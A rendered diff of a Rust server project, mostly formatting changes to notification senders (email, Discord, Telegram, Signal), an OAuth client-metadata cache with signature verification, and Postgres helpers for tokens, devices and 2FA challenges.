let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
53
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
54
}
55
+
56
pub fn sanitize_header_value(value: &str) -> String {
57
value.replace(['\r', '\n'], " ").trim().to_string()
58
}
59
+
60
pub fn is_valid_phone_number(number: &str) -> bool {
61
if number.len() < 2 || number.len() > 20 {
62
return false;
···
68
let remaining: String = chars.collect();
69
!remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
70
}
71
+
72
pub struct EmailSender {
73
from_address: String,
74
from_name: String,
75
sendmail_path: String,
76
}
77
+
78
impl EmailSender {
79
pub fn new(from_address: String, from_name: String) -> Self {
80
Self {
···
83
sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()),
84
}
85
}
86
+
87
pub fn from_env() -> Option<Self> {
88
let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?;
89
let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "BSPDS".to_string());
90
Some(Self::new(from_address, from_name))
91
}
92
+
93
pub fn format_email(&self, notification: &QueuedNotification) -> String {
94
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
95
let recipient = sanitize_header_value(¬ification.recipient);
···
107
)
108
}
109
}
110
+
111
#[async_trait]
112
impl NotificationSender for EmailSender {
113
fn channel(&self) -> NotificationChannel {
114
NotificationChannel::Email
115
}
116
+
117
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
118
let email_content = self.format_email(notification);
119
let mut child = Command::new(&self.sendmail_path)
···
134
Ok(())
135
}
136
}
137
+
138
pub struct DiscordSender {
139
webhook_url: String,
140
http_client: Client,
141
}
142
+
143
impl DiscordSender {
144
pub fn new(webhook_url: String) -> Self {
145
Self {
···
147
http_client: create_http_client(),
148
}
149
}
150
+
151
pub fn from_env() -> Option<Self> {
152
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
153
Some(Self::new(webhook_url))
154
}
155
}
156
+
157
#[async_trait]
158
impl NotificationSender for DiscordSender {
159
fn channel(&self) -> NotificationChannel {
160
NotificationChannel::Discord
161
}
162
+
163
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
164
let subject = notification.subject.as_deref().unwrap_or("Notification");
165
let content = format!("**{}**\n\n{}", subject, notification.body);
···
213
))
214
}
215
}
216
+
217
pub struct TelegramSender {
218
bot_token: String,
219
http_client: Client,
220
}
221
+
222
impl TelegramSender {
223
pub fn new(bot_token: String) -> Self {
224
Self {
···
226
http_client: create_http_client(),
227
}
228
}
229
+
230
pub fn from_env() -> Option<Self> {
231
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
232
Some(Self::new(bot_token))
233
}
234
}
235
+
236
#[async_trait]
237
impl NotificationSender for TelegramSender {
238
fn channel(&self) -> NotificationChannel {
239
NotificationChannel::Telegram
240
}
241
+
242
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
243
let chat_id = ¬ification.recipient;
244
let subject = notification.subject.as_deref().unwrap_or("Notification");
···
298
))
299
}
300
}
301
+
302
pub struct SignalSender {
303
signal_cli_path: String,
304
sender_number: String,
305
}
306
+
307
impl SignalSender {
308
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
309
Self {
···
311
sender_number,
312
}
313
}
314
+
315
pub fn from_env() -> Option<Self> {
316
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
317
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
···
319
Some(Self::new(signal_cli_path, sender_number))
320
}
321
}
322
+
323
#[async_trait]
324
impl NotificationSender for SignalSender {
325
fn channel(&self) -> NotificationChannel {
326
NotificationChannel::Signal
327
}
328
+
329
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
330
let recipient = ¬ification.recipient;
331
if !is_valid_phone_number(recipient) {
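The retry schedule implied by INITIAL_RETRY_DELAY_MS and retry_delay above, restated as a tiny check so the doubling is explicit (helper name is illustrative).
fn backoff_ms(attempt: u32) -> u64 {
    500 * 2u64.pow(attempt)
}

#[test]
fn backoff_schedule() {
    // attempts 0..MAX_RETRIES -> 500 ms, 1 s, 2 s
    assert_eq!((0..3).map(backoff_ms).collect::<Vec<_>>(), vec![500, 1000, 2000]);
}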
+27
src/notifications/service.rs
···
1
use std::collections::HashMap;
2
use std::sync::Arc;
3
use std::time::Duration;
4
+
5
use chrono::Utc;
6
use sqlx::PgPool;
7
use tokio::sync::watch;
8
use tokio::time::interval;
9
use tracing::{debug, error, info, warn};
10
use uuid::Uuid;
11
+
12
use super::sender::{NotificationSender, SendError};
13
use super::types::{NewNotification, NotificationChannel, NotificationStatus, QueuedNotification};
14
+
15
pub struct NotificationService {
16
db: PgPool,
17
senders: HashMap<NotificationChannel, Arc<dyn NotificationSender>>,
18
poll_interval: Duration,
19
batch_size: i64,
20
}
21
+
22
impl NotificationService {
23
pub fn new(db: PgPool) -> Self {
24
let poll_interval_ms: u64 = std::env::var("NOTIFICATION_POLL_INTERVAL_MS")
···
36
batch_size,
37
}
38
}
39
+
40
pub fn with_poll_interval(mut self, interval: Duration) -> Self {
41
self.poll_interval = interval;
42
self
43
}
44
+
45
pub fn with_batch_size(mut self, size: i64) -> Self {
46
self.batch_size = size;
47
self
48
}
49
+
50
pub fn register_sender<S: NotificationSender + 'static>(mut self, sender: S) -> Self {
51
self.senders.insert(sender.channel(), Arc::new(sender));
52
self
53
}
54
+
55
pub async fn enqueue(&self, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
56
let id = sqlx::query_scalar!(
57
r#"
···
73
debug!(notification_id = %id, "Notification enqueued");
74
Ok(id)
75
}
76
+
77
pub fn has_senders(&self) -> bool {
78
!self.senders.is_empty()
79
}
80
+
81
pub async fn run(self, mut shutdown: watch::Receiver<bool>) {
82
if self.senders.is_empty() {
83
warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured.");
···
105
}
106
}
107
}
108
+
109
async fn process_batch(&self) -> Result<(), sqlx::Error> {
110
let notifications = self.fetch_pending_notifications().await?;
111
if notifications.is_empty() {
···
117
}
118
Ok(())
119
}
120
+
121
async fn fetch_pending_notifications(&self) -> Result<Vec<QueuedNotification>, sqlx::Error> {
122
let now = Utc::now();
123
sqlx::query_as!(
···
149
.fetch_all(&self.db)
150
.await
151
}
152
+
153
async fn process_notification(&self, notification: QueuedNotification) {
154
let notification_id = notification.id;
155
let channel = notification.channel;
···
192
}
193
}
194
}
195
+
196
async fn mark_sent(&self, id: Uuid) -> Result<(), sqlx::Error> {
197
sqlx::query!(
198
r#"
···
206
.await?;
207
Ok(())
208
}
209
+
210
async fn mark_failed(&self, id: Uuid, error: &str) -> Result<(), sqlx::Error> {
211
sqlx::query!(
212
r#"
···
230
Ok(())
231
}
232
}
233
+
234
pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
235
sqlx::query_scalar!(
236
r#"
···
250
.fetch_one(db)
251
.await
252
}
253
+
254
pub struct UserNotificationPrefs {
255
pub channel: NotificationChannel,
256
pub email: Option<String>,
257
pub handle: String,
258
}
259
+
260
pub async fn get_user_notification_prefs(
261
db: &PgPool,
262
user_id: Uuid,
···
280
handle: row.handle,
281
})
282
}
283
+
284
pub async fn enqueue_welcome(
285
db: &PgPool,
286
user_id: Uuid,
···
304
)
305
.await
306
}
307
+
308
pub async fn enqueue_email_verification(
309
db: &PgPool,
310
user_id: Uuid,
···
329
)
330
.await
331
}
332
+
333
pub async fn enqueue_password_reset(
334
db: &PgPool,
335
user_id: Uuid,
···
354
)
355
.await
356
}
357
+
358
pub async fn enqueue_email_update(
359
db: &PgPool,
360
user_id: Uuid,
···
379
)
380
.await
381
}
382
+
383
pub async fn enqueue_account_deletion(
384
db: &PgPool,
385
user_id: Uuid,
···
404
)
405
.await
406
}
407
+
408
pub async fn enqueue_plc_operation(
409
db: &PgPool,
410
user_id: Uuid,
···
429
)
430
.await
431
}
432
+
433
pub async fn enqueue_2fa_code(
434
db: &PgPool,
435
user_id: Uuid,
···
454
)
455
.await
456
}
457
+
458
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
459
match channel {
460
NotificationChannel::Email => "email",
···
463
NotificationChannel::Signal => "Signal",
464
}
465
}
466
+
467
pub async fn enqueue_signup_verification(
468
db: &PgPool,
469
user_id: Uuid,
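A configuration sketch chaining the builder methods above; the interval, batch size, and sender address are illustrative, and the import path assumes the re-exports in notifications/mod.rs.
use std::time::Duration;
use sqlx::PgPool;
use bspds::notifications::{EmailSender, NotificationService};

fn build_notification_service(pool: PgPool) -> NotificationService {
    NotificationService::new(pool)
        .with_poll_interval(Duration::from_secs(2))
        .with_batch_size(50)
        .register_sender(EmailSender::new(
            "noreply@example.com".to_string(),
            "BSPDS".to_string(),
        ))
}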
+7
src/notifications/types.rs
···
2
use serde::{Deserialize, Serialize};
3
use sqlx::FromRow;
4
use uuid::Uuid;
5
+
6
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, sqlx::Type, Serialize, Deserialize)]
7
#[sqlx(type_name = "notification_channel", rename_all = "lowercase")]
8
pub enum NotificationChannel {
···
11
Telegram,
12
Signal,
13
}
14
+
15
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
16
#[sqlx(type_name = "notification_status", rename_all = "lowercase")]
17
pub enum NotificationStatus {
···
20
Sent,
21
Failed,
22
}
23
+
24
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
25
#[sqlx(type_name = "notification_type", rename_all = "snake_case")]
26
pub enum NotificationType {
···
33
PlcOperation,
34
TwoFactorCode,
35
}
36
+
37
#[derive(Debug, Clone, FromRow)]
38
pub struct QueuedNotification {
39
pub id: Uuid,
···
53
pub scheduled_for: DateTime<Utc>,
54
pub processed_at: Option<DateTime<Utc>>,
55
}
56
+
57
pub struct NewNotification {
58
pub user_id: Uuid,
59
pub channel: NotificationChannel,
···
63
pub body: String,
64
pub metadata: Option<serde_json::Value>,
65
}
66
+
67
impl NewNotification {
68
pub fn new(
69
user_id: Uuid,
···
83
metadata: None,
84
}
85
}
86
+
87
pub fn email(
88
user_id: Uuid,
89
notification_type: NotificationType,
+22
src/oauth/client.rs
···
3
use std::collections::HashMap;
4
use std::sync::Arc;
5
use tokio::sync::RwLock;
6
use super::OAuthError;
7
#[derive(Debug, Clone, Serialize, Deserialize)]
8
pub struct ClientMetadata {
9
pub client_id: String,
···
31
#[serde(skip_serializing_if = "Option::is_none")]
32
pub application_type: Option<String>,
33
}
34
impl Default for ClientMetadata {
35
fn default() -> Self {
36
Self {
···
50
}
51
}
52
}
53
#[derive(Clone)]
54
pub struct ClientMetadataCache {
55
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
···
57
http_client: Client,
58
cache_ttl_secs: u64,
59
}
60
struct CachedMetadata {
61
metadata: ClientMetadata,
62
cached_at: std::time::Instant,
63
}
64
struct CachedJwks {
65
jwks: serde_json::Value,
66
cached_at: std::time::Instant,
67
}
68
impl ClientMetadataCache {
69
pub fn new(cache_ttl_secs: u64) -> Self {
70
Self {
···
78
cache_ttl_secs,
79
}
80
}
81
pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
82
{
83
let cache = self.cache.read().await;
···
100
}
101
Ok(metadata)
102
}
103
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
104
if let Some(jwks) = &metadata.jwks {
105
return Ok(jwks.clone());
···
130
}
131
Ok(jwks)
132
}
133
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
134
if !jwks_uri.starts_with("https://") {
135
if !jwks_uri.starts_with("http://")
···
166
}
167
Ok(jwks)
168
}
169
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
170
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
171
return Err(OAuthError::InvalidClient(
···
207
self.validate_metadata(&metadata)?;
208
Ok(metadata)
209
}
210
fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> {
211
if metadata.redirect_uris.is_empty() {
212
return Err(OAuthError::InvalidClient(
···
232
}
233
Ok(())
234
}
235
pub fn validate_redirect_uri(
236
&self,
237
metadata: &ClientMetadata,
···
244
}
245
Ok(())
246
}
247
fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> {
248
if uri.contains('#') {
249
return Err(OAuthError::InvalidClient(
···
278
Ok(())
279
}
280
}
281
impl ClientMetadata {
282
pub fn requires_dpop(&self) -> bool {
283
self.dpop_bound_access_tokens.unwrap_or(false)
284
}
285
pub fn auth_method(&self) -> &str {
286
self.token_endpoint_auth_method
287
.as_deref()
288
.unwrap_or("none")
289
}
290
}
291
pub async fn verify_client_auth(
292
cache: &ClientMetadataCache,
293
metadata: &ClientMetadata,
···
321
))),
322
}
323
}
324
async fn verify_private_key_jwt_async(
325
cache: &ClientMetadataCache,
326
metadata: &ClientMetadata,
···
425
"client_assertion signature verification failed".to_string(),
426
))
427
}
428
fn verify_es256(
429
key: &serde_json::Value,
430
signing_input: &str,
···
456
.verify(signing_input.as_bytes(), &sig)
457
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
458
}
459
fn verify_es384(
460
key: &serde_json::Value,
461
signing_input: &str,
···
487
.verify(signing_input.as_bytes(), &sig)
488
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
489
}
490
fn verify_rsa(
491
_alg: &str,
492
_key: &serde_json::Value,
···
497
"RSA signature verification not yet supported - use EC keys".to_string(),
498
))
499
}
500
fn verify_eddsa(
501
key: &serde_json::Value,
502
signing_input: &str,
···
3
use std::collections::HashMap;
4
use std::sync::Arc;
5
use tokio::sync::RwLock;
6
+
7
use super::OAuthError;
8
+
9
#[derive(Debug, Clone, Serialize, Deserialize)]
10
pub struct ClientMetadata {
11
pub client_id: String,
···
33
#[serde(skip_serializing_if = "Option::is_none")]
34
pub application_type: Option<String>,
35
}
36
+
37
impl Default for ClientMetadata {
38
fn default() -> Self {
39
Self {
···
53
}
54
}
55
}
56
+
57
#[derive(Clone)]
58
pub struct ClientMetadataCache {
59
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
···
61
http_client: Client,
62
cache_ttl_secs: u64,
63
}
64
+
65
struct CachedMetadata {
66
metadata: ClientMetadata,
67
cached_at: std::time::Instant,
68
}
69
+
70
struct CachedJwks {
71
jwks: serde_json::Value,
72
cached_at: std::time::Instant,
73
}
74
+
75
impl ClientMetadataCache {
76
pub fn new(cache_ttl_secs: u64) -> Self {
77
Self {
···
85
cache_ttl_secs,
86
}
87
}
88
+
89
pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
90
{
91
let cache = self.cache.read().await;
···
108
}
109
Ok(metadata)
110
}
111
+
112
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
113
if let Some(jwks) = &metadata.jwks {
114
return Ok(jwks.clone());
···
139
}
140
Ok(jwks)
141
}
142
+
143
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
144
if !jwks_uri.starts_with("https://") {
145
if !jwks_uri.starts_with("http://")
···
176
}
177
Ok(jwks)
178
}
179
+
180
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
181
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
182
return Err(OAuthError::InvalidClient(
···
218
self.validate_metadata(&metadata)?;
219
Ok(metadata)
220
}
221
+
222
fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> {
223
if metadata.redirect_uris.is_empty() {
224
return Err(OAuthError::InvalidClient(
···
244
}
245
Ok(())
246
}
247
+
248
pub fn validate_redirect_uri(
249
&self,
250
metadata: &ClientMetadata,
···
257
}
258
Ok(())
259
}
260
+
261
fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> {
262
if uri.contains('#') {
263
return Err(OAuthError::InvalidClient(
···
292
Ok(())
293
}
294
}
295
+
296
impl ClientMetadata {
297
pub fn requires_dpop(&self) -> bool {
298
self.dpop_bound_access_tokens.unwrap_or(false)
299
}
300
+
301
pub fn auth_method(&self) -> &str {
302
self.token_endpoint_auth_method
303
.as_deref()
304
.unwrap_or("none")
305
}
306
}
307
+
308
pub async fn verify_client_auth(
309
cache: &ClientMetadataCache,
310
metadata: &ClientMetadata,
···
338
))),
339
}
340
}
341
+
342
async fn verify_private_key_jwt_async(
343
cache: &ClientMetadataCache,
344
metadata: &ClientMetadata,
···
443
"client_assertion signature verification failed".to_string(),
444
))
445
}
446
+
447
fn verify_es256(
448
key: &serde_json::Value,
449
signing_input: &str,
···
475
.verify(signing_input.as_bytes(), &sig)
476
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
477
}
478
+
479
fn verify_es384(
480
key: &serde_json::Value,
481
signing_input: &str,
···
507
.verify(signing_input.as_bytes(), &sig)
508
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
509
}
510
+
511
fn verify_rsa(
512
_alg: &str,
513
_key: &serde_json::Value,
···
518
"RSA signature verification not yet supported - use EC keys".to_string(),
519
))
520
}
521
+
522
fn verify_eddsa(
523
key: &serde_json::Value,
524
signing_input: &str,
+2
src/oauth/db/client.rs
···
1
use sqlx::PgPool;
2
use super::super::{AuthorizedClientData, OAuthError};
3
use super::helpers::{from_json, to_json};
4
+
5
pub async fn upsert_authorized_client(
6
pool: &PgPool,
7
did: &str,
···
23
.await?;
24
Ok(())
25
}
26
+
27
pub async fn get_authorized_client(
28
pool: &PgPool,
29
did: &str,
+8
src/oauth/db/device.rs
···
1
use chrono::{DateTime, Utc};
2
use sqlx::PgPool;
3
use super::super::{DeviceData, OAuthError};
4
pub struct DeviceAccountRow {
5
pub did: String,
6
pub handle: String,
7
pub email: Option<String>,
8
pub last_used_at: DateTime<Utc>,
9
}
10
pub async fn create_device(
11
pool: &PgPool,
12
device_id: &str,
···
27
.await?;
28
Ok(())
29
}
30
pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> {
31
let row = sqlx::query!(
32
r#"
···
45
last_seen_at: r.last_seen_at,
46
}))
47
}
48
pub async fn update_device_last_seen(
49
pool: &PgPool,
50
device_id: &str,
···
61
.await?;
62
Ok(())
63
}
64
pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> {
65
sqlx::query!(
66
r#"
···
72
.await?;
73
Ok(())
74
}
75
pub async fn upsert_account_device(
76
pool: &PgPool,
77
did: &str,
···
90
.await?;
91
Ok(())
92
}
93
pub async fn get_device_accounts(
94
pool: &PgPool,
95
device_id: &str,
···
118
})
119
.collect())
120
}
121
pub async fn verify_account_on_device(
122
pool: &PgPool,
123
device_id: &str,
···
1
use chrono::{DateTime, Utc};
2
use sqlx::PgPool;
3
use super::super::{DeviceData, OAuthError};
4
+
5
pub struct DeviceAccountRow {
6
pub did: String,
7
pub handle: String,
8
pub email: Option<String>,
9
pub last_used_at: DateTime<Utc>,
10
}
11
+
12
pub async fn create_device(
13
pool: &PgPool,
14
device_id: &str,
···
29
.await?;
30
Ok(())
31
}
32
+
33
pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> {
34
let row = sqlx::query!(
35
r#"
···
48
last_seen_at: r.last_seen_at,
49
}))
50
}
51
+
52
pub async fn update_device_last_seen(
53
pool: &PgPool,
54
device_id: &str,
···
65
.await?;
66
Ok(())
67
}
68
+
69
pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> {
70
sqlx::query!(
71
r#"
···
77
.await?;
78
Ok(())
79
}
80
+
81
pub async fn upsert_account_device(
82
pool: &PgPool,
83
did: &str,
···
96
.await?;
97
Ok(())
98
}
99
+
100
pub async fn get_device_accounts(
101
pool: &PgPool,
102
device_id: &str,
···
125
})
126
.collect())
127
}
128
+
129
pub async fn verify_account_on_device(
130
pool: &PgPool,
131
device_id: &str,
+2
src/oauth/db/dpop.rs
+2
src/oauth/db/helpers.rs
···
1
use serde::{de::DeserializeOwned, Serialize};
2
use super::super::OAuthError;
3
pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> {
4
serde_json::to_value(value).map_err(|e| {
5
tracing::error!("JSON serialization error: {}", e);
6
OAuthError::ServerError("Internal serialization error".to_string())
7
})
8
}
9
pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> {
10
serde_json::from_value(value).map_err(|e| {
11
tracing::error!("JSON deserialization error: {}", e);
···
1
use serde::{de::DeserializeOwned, Serialize};
2
use super::super::OAuthError;
3
+
4
pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> {
5
serde_json::to_value(value).map_err(|e| {
6
tracing::error!("JSON serialization error: {}", e);
7
OAuthError::ServerError("Internal serialization error".to_string())
8
})
9
}
10
+
11
pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> {
12
serde_json::from_value(value).map_err(|e| {
13
tracing::error!("JSON deserialization error: {}", e);
+1
src/oauth/db/mod.rs
+6
src/oauth/db/request.rs
···
1
use sqlx::PgPool;
2
use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData};
3
use super::helpers::{from_json, to_json};
4
pub async fn create_authorization_request(
5
pool: &PgPool,
6
request_id: &str,
···
30
.await?;
31
Ok(())
32
}
33
pub async fn get_authorization_request(
34
pool: &PgPool,
35
request_id: &str,
···
64
None => Ok(None),
65
}
66
}
67
pub async fn update_authorization_request(
68
pool: &PgPool,
69
request_id: &str,
···
86
.await?;
87
Ok(())
88
}
89
pub async fn consume_authorization_request_by_code(
90
pool: &PgPool,
91
code: &str,
···
120
None => Ok(None),
121
}
122
}
123
pub async fn delete_authorization_request(
124
pool: &PgPool,
125
request_id: &str,
···
134
.await?;
135
Ok(())
136
}
137
pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> {
138
let result = sqlx::query!(
139
r#"
···
1
use sqlx::PgPool;
2
use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData};
3
use super::helpers::{from_json, to_json};
4
+
5
pub async fn create_authorization_request(
6
pool: &PgPool,
7
request_id: &str,
···
31
.await?;
32
Ok(())
33
}
34
+
35
pub async fn get_authorization_request(
36
pool: &PgPool,
37
request_id: &str,
···
66
None => Ok(None),
67
}
68
}
69
+
70
pub async fn update_authorization_request(
71
pool: &PgPool,
72
request_id: &str,
···
89
.await?;
90
Ok(())
91
}
92
+
93
pub async fn consume_authorization_request_by_code(
94
pool: &PgPool,
95
code: &str,
···
124
None => Ok(None),
125
}
126
}
127
+
128
pub async fn delete_authorization_request(
129
pool: &PgPool,
130
request_id: &str,
···
139
.await?;
140
Ok(())
141
}
142
+
143
pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> {
144
let result = sqlx::query!(
145
r#"
+12
src/oauth/db/token.rs
···
2
use sqlx::PgPool;
3
use super::super::{OAuthError, TokenData};
4
use super::helpers::{from_json, to_json};
5
pub async fn create_token(
6
pool: &PgPool,
7
data: &TokenData,
···
34
.await?;
35
Ok(row.id)
36
}
37
pub async fn get_token_by_id(
38
pool: &PgPool,
39
token_id: &str,
···
68
None => Ok(None),
69
}
70
}
71
pub async fn get_token_by_refresh_token(
72
pool: &PgPool,
73
refresh_token: &str,
···
105
None => Ok(None),
106
}
107
}
108
pub async fn rotate_token(
109
pool: &PgPool,
110
old_db_id: i32,
···
149
tx.commit().await?;
150
Ok(())
151
}
152
pub async fn check_refresh_token_used(
153
pool: &PgPool,
154
refresh_token: &str,
···
163
.await?;
164
Ok(row)
165
}
166
pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> {
167
sqlx::query!(
168
r#"
···
174
.await?;
175
Ok(())
176
}
177
pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> {
178
sqlx::query!(
179
r#"
···
185
.await?;
186
Ok(())
187
}
188
pub async fn list_tokens_for_user(
189
pool: &PgPool,
190
did: &str,
···
220
}
221
Ok(tokens)
222
}
223
pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> {
224
let count = sqlx::query_scalar!(
225
r#"
···
231
.await?;
232
Ok(count)
233
}
234
pub async fn delete_oldest_tokens_for_user(
235
pool: &PgPool,
236
did: &str,
···
253
.await?;
254
Ok(result.rows_affected())
255
}
256
const MAX_TOKENS_PER_USER: i64 = 100;
257
pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> {
258
let count = count_tokens_for_user(pool, did).await?;
259
if count > MAX_TOKENS_PER_USER {
···
2
use sqlx::PgPool;
3
use super::super::{OAuthError, TokenData};
4
use super::helpers::{from_json, to_json};
5
+
6
pub async fn create_token(
7
pool: &PgPool,
8
data: &TokenData,
···
35
.await?;
36
Ok(row.id)
37
}
38
+
39
pub async fn get_token_by_id(
40
pool: &PgPool,
41
token_id: &str,
···
70
None => Ok(None),
71
}
72
}
73
+
74
pub async fn get_token_by_refresh_token(
75
pool: &PgPool,
76
refresh_token: &str,
···
108
None => Ok(None),
109
}
110
}
111
+
112
pub async fn rotate_token(
113
pool: &PgPool,
114
old_db_id: i32,
···
153
tx.commit().await?;
154
Ok(())
155
}
156
+
157
pub async fn check_refresh_token_used(
158
pool: &PgPool,
159
refresh_token: &str,
···
168
.await?;
169
Ok(row)
170
}
171
+
172
pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> {
173
sqlx::query!(
174
r#"
···
180
.await?;
181
Ok(())
182
}
183
+
184
pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> {
185
sqlx::query!(
186
r#"
···
192
.await?;
193
Ok(())
194
}
195
+
196
pub async fn list_tokens_for_user(
197
pool: &PgPool,
198
did: &str,
···
228
}
229
Ok(tokens)
230
}
231
+
232
pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> {
233
let count = sqlx::query_scalar!(
234
r#"
···
240
.await?;
241
Ok(count)
242
}
243
+
244
pub async fn delete_oldest_tokens_for_user(
245
pool: &PgPool,
246
did: &str,
···
263
.await?;
264
Ok(result.rows_affected())
265
}
266
+
267
const MAX_TOKENS_PER_USER: i64 = 100;
268
+
269
pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> {
270
let count = count_tokens_for_user(pool, did).await?;
271
if count > MAX_TOKENS_PER_USER {
+9
src/oauth/db/two_factor.rs
···
3
use sqlx::PgPool;
4
use uuid::Uuid;
5
use super::super::OAuthError;
6
pub struct TwoFactorChallenge {
7
pub id: Uuid,
8
pub did: String,
···
12
pub created_at: DateTime<Utc>,
13
pub expires_at: DateTime<Utc>,
14
}
15
pub fn generate_2fa_code() -> String {
16
let mut rng = rand::thread_rng();
17
let code: u32 = rng.gen_range(0..1_000_000);
18
format!("{:06}", code)
19
}
20
pub async fn create_2fa_challenge(
21
pool: &PgPool,
22
did: &str,
···
47
expires_at: row.expires_at,
48
})
49
}
50
pub async fn get_2fa_challenge(
51
pool: &PgPool,
52
request_uri: &str,
···
71
expires_at: r.expires_at,
72
}))
73
}
74
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
75
let row = sqlx::query!(
76
r#"
···
85
.await?;
86
Ok(row.attempts)
87
}
88
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
89
sqlx::query!(
90
r#"
···
96
.await?;
97
Ok(())
98
}
99
pub async fn delete_2fa_challenge_by_request_uri(
100
pool: &PgPool,
101
request_uri: &str,
···
110
.await?;
111
Ok(())
112
}
113
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
114
let result = sqlx::query!(
115
r#"
···
120
.await?;
121
Ok(result.rows_affected())
122
}
123
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
124
let row = sqlx::query!(
125
r#"
···
3
use sqlx::PgPool;
4
use uuid::Uuid;
5
use super::super::OAuthError;
6
+
7
pub struct TwoFactorChallenge {
8
pub id: Uuid,
9
pub did: String,
···
13
pub created_at: DateTime<Utc>,
14
pub expires_at: DateTime<Utc>,
15
}
16
+
17
pub fn generate_2fa_code() -> String {
18
let mut rng = rand::thread_rng();
19
let code: u32 = rng.gen_range(0..1_000_000);
20
format!("{:06}", code)
21
}
22
+
23
pub async fn create_2fa_challenge(
24
pool: &PgPool,
25
did: &str,
···
50
expires_at: row.expires_at,
51
})
52
}
53
+
54
pub async fn get_2fa_challenge(
55
pool: &PgPool,
56
request_uri: &str,
···
75
expires_at: r.expires_at,
76
}))
77
}
78
+
79
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
80
let row = sqlx::query!(
81
r#"
···
90
.await?;
91
Ok(row.attempts)
92
}
93
+
94
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
95
sqlx::query!(
96
r#"
···
102
.await?;
103
Ok(())
104
}
105
+
106
pub async fn delete_2fa_challenge_by_request_uri(
107
pool: &PgPool,
108
request_uri: &str,
···
117
.await?;
118
Ok(())
119
}
120
+
121
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
122
let result = sqlx::query!(
123
r#"
···
128
.await?;
129
Ok(result.rows_affected())
130
}
131
+
132
